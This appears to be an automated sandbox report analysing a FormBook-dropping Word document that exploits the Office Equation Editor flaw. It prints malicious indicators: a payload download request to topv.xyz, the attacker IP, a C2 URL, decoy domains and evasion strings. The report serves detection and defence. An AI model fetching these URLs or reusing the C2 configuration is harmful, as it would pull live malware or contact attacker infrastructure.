
Windows Analysis Report: PO4018308875.doc

Overview

General Information

Sample Name: PO4018308875.doc
Analysis ID: 452509
MD5: 1e7bc879d7960afaa08148c635ae534f
SHA1: e1a0db056bdc1cba07ef43c27a80e5bfd79b4eac
SHA256: 8c4b07ce49252a4ed12ad611a9f8fde65a63fc12368c6726776e86e140d3872e
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2716 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1328 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • princedan859323.exe (PID: 3036 cmdline: C:\Users\user\AppData\Roaming\princedan859323.exe MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2516 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2736 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2604 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2676 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 3016 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 3000 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2972 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2948 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2964 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Yara Overview

Memory Dumps

Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source: 4.2.princedan859323.exe.340af10.5.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 4.2.princedan859323.exe.340af10.5.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.princedan859323.exe.340af10.5.raw.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1328, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\princedan859323.exe, CommandLine: C:\Users\user\AppData\Roaming\princedan859323.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\princedan859323.exe, NewProcessName: C:\Users\user\AppData\Roaming\princedan859323.exe, OriginalFileName: C:\Users\user\AppData\Roaming\princedan859323.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1328, ProcessCommandLine: C:\Users\user\AppData\Roaming\princedan859323.exe, ProcessId: 3036

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://topv.xyz/princedanx.exe; Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook (the extracted C2 list and decoy domains are given in full under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\princedan859323.exe; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\princedan859323.exe; ReversingLabs: Detection: 23%
Multi AV Scanner detection for submitted file
Source: PO4018308875.doc; ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match; File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\princedan859323.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\princedan859323.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic; DNS query: name: topv.xyz
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.containerflippers.com/np0c/
Performs DNS queries to domains with low reputation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; DNS query: topv.xyz
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; DNS query: topv.xyz
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Thu, 22 Jul 2021 12:14:41 GMT | Content-Type: application/x-msdownload | Content-Length: 648912 | Last-Modified: Wed, 21 Jul 2021 23:31:35 GMT | Connection: keep-alive | ETag: "60f8ae57-9e6d0" | Accept-Ranges: bytes
Source: Joe Sandbox View; IP Address: 185.239.243.112
Source: Joe Sandbox View; ASN Name: CLOUDIE-AS-APCloudieLimitedHK
Source: global traffic; HTTP traffic detected: GET /princedanx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: topv.xyz | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09F78D-537D-406E-B057-1B1541B1D39D}.tmp
Source: global traffic; HTTP traffic detected: GET /princedanx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: topv.xyz | Connection: Keep-Alive
Source: unknown; DNS traffic detected: queries for: topv.xyz
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp; String found in binary or memory: http://go.microso
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://ocsp.digicert.com0H
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://ocsp.digicert.com0I
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://ocsp.digicert.com0O
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: http://www.opera.com0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr; String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Roaming\princedan859323.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002EA290
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002E1F28
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002E1F18
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_006E06D5
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_007558C0
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_0075845F
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_0075852B
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\princedan859323.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\princedan859323.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
          Source: princedanx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedanx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: princedanx[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: princedan859323.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: princedan859323.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@24/10@2/1
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$4018308875.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC12C.tmp
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: PO4018308875.doc | ReversingLabs: Detection: 41%
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Code function: 4_2_002E48B5 push eax; retf
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Code function: 4_2_002E29DF push eax; retf
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Code function: 4_2_006E1E8E push 8B032975h; retf
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | File created: C:\Users\user\AppData\Local\Temp\princedan859323.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Window / User API: threadDelayed 1629
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2664 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe TID: 3052 | Thread sleep time: -922337203685477s >= -30000s
